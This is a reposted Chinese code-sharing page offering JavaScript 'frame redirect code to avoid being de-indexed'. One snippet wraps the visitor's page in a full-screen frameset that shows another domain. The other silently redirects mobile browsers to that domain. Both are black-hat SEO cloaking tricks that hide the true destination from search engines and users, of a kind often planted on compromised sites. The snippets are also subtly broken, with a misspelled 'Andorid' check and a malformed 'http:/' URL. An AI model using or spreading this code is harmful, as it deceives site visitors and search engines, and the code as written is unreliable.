码迷,mamicode.com
首页 > 其他好文 > 详细

防K站框架跳转代码

时间:2019-11-16 14:25:38      阅读:65      评论:0      收藏:0      [点我收藏+]

标签:pod   border   document   pac   oca   cin   ipo   try   eset   

pc端跳转

document.writeln("document.write(\"<frameset rows=\‘100%,*\‘frameborder=\‘NO\‘border=\‘0\‘framespacing=\‘0\‘>\");");

document.writeln("document.write(\"<frame name=\‘main\‘src=\‘http://www.zhizhuowz.com/‘scrolling=yes>\");");

document.writeln("document.write(\"<\/frameset>\");");

document.writeln("<\/script>");

 

网页手机端跳转

<script type="text/javascript">

if(/Andorid|webOS|iPod|BlackBerry|Windows Phone/i.test(navigator.userAgent)){

if(window.location.href.indexOf("?pc")<0){try{window.location.href="http:/www.zhizhuowz.com/"}

catch(e){}}}</script>

防K站框架跳转代码

标签:pod   border   document   pac   oca   cin   ipo   try   eset   

原文地址:https://www.cnblogs.com/hongyuyingxiao/p/11871419.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!